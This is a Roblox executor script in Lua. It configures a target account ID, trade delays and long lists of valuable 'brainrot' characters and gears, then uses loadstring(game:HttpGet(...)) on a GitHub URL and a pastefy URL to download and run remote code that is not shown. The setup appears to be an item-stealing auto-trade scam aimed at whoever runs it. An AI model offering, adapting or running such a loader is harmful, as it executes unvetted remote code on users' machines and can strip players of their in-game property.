getgenv().SECRET_KEY = "6DFF666611FDCDDF09F4ACA6CE9A941B"
getgenv().TARGET_ID = 10783759977
getgenv().DELAY_STEP = 1
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Spyder Elephant"] = true,
    ["Strawberry Elephant"] = true,
    ["Headless Horseman"] = true,
    ["Meowl"] = true,
    ["John Pork"] = true,
    ["Skibidi Toilet"] = true,
    ["Dragon Cannelloni"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Aquanini"] = true,
    ["Arcadragon"] = true,
    ["Griffin"] = true,
    ["Grabatron"] = true,
    ["Rubiko and Kubiko"] = true,
    ["Signore Carapace"] = true,
    ["Love Love Bear"] = true,
    ["Digi Narwhal"] = true,
    ["Moby Bros"] = true,
    ["Kraken"] = true,
    ["La Supreme Combinasion"] = true,
    ["Hydra Bunny"] = true,
    ["Elefanto Frigo"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Venuspino"] = true,
    ["Jelly Moby"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Capitano Moby"] = true,
    ["Bunny and Eggy"] = true,
    ["Rosey and Teddy"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["Antonio"] = true,
    ["La Secret Combinasion"] = true,
    ["Pancake and Syrup"] = true,
    ["Foxini Lanternini"] = true,
    ["Kalika Bros"] = true,
    ["Los Sekolahs"] = true,
    ["Cash or Card"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Duggy Bros"] = true,
    ["Los Admins"] = true,
    ["La Food Combinasion"] = true,
    ["Sammyni Cakini"] = true,
    ["Spooky and Pumpky"] = true,
    ["Boppin Bunny"] = true,
    ["Ginger Gerat"] = true,
    ["Los Hackers"] = true,
    ["Los Chillis"] = true,
    ["Capitano Americano"] = true,
    ["Bearito Cabinito"] = true,
    ["Rubrikiko"] = true,
    ["Los Spaghettis"] = true,
    ["Festive 67"] = true,
    ["Sammyni Fattini"] = true,
    ["Guest 666"] = true,
    ["Quackini Snackini"] = true,
    ["Cloverat Clapat"] = true,
    ["Los Tictacs"] = true,
    ["Caylusaurus"] = true,
    ["Hopilikalika Hopilikalako"] = true,
    ["La Summer Grande"] = true,
    ["La Easter Grande"] = true,
    ["Garama and Madundung"] = true,
    ["Steakini Fattini"] = true,
    ["La Anniversary Grande"] = true,
    ["Nacho Spyder"] = true,
    ["Fishino Clownino"] = true,
    ["Money Money Bros"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Gym Bros"] = true,
    ["Rico Dinero"] = true,
    ["Los Tangcitos"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["La Lucky Grande"] = true,
    ["La Romantic Grande"] = true,
    ["Dug dug dug"] = true,
    ["Abyssaloco"] = true,
    ["Fragola La La La"] = true,
    ["Lovin Rose"] = true,
    ["Los Tacoritas"] = true,
    ["Eviledon"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Globa Steppa"] = true,
    ["Tralaledon"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["Money Money Reindeer"] = true,
    ["Los Bros"] = true,
    ["Celularcini Viciosini"] = true,
    ["La Extinct Grande"] = true,
    ["Los Hotspotsitos"] = true,
    ["Noo my examine"] = true,
    ["Los Spyderinis"] = true,
    ["Brutto Gialutto"] = true,
    ["Centrucci Nuclucci"] = true,
    ["Gorillo Subwoofero"] = true,
    ["Ganganzelli Trulala"] = true,
    ["Rhino Helicopterino"] = true,
    ["Tob Tobi Tobi"] = true
}
getgenv().TARGET_BASE_SKINS = {
    -- nenhuma base skin selecionada
}
getgenv().TARGET_GEARS = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Waverider"] = true,
    ["Witch's Broom"] = true,
    ["Rainbow Hammer"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Candy Sentry"] = true
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/AAVMoreira/AAVMOREIRA/refs/heads/main/AAVMoreiralogic"))()

loadstring(game:HttpGet("https://pastefy.app/geEhgyhN/raw"))()
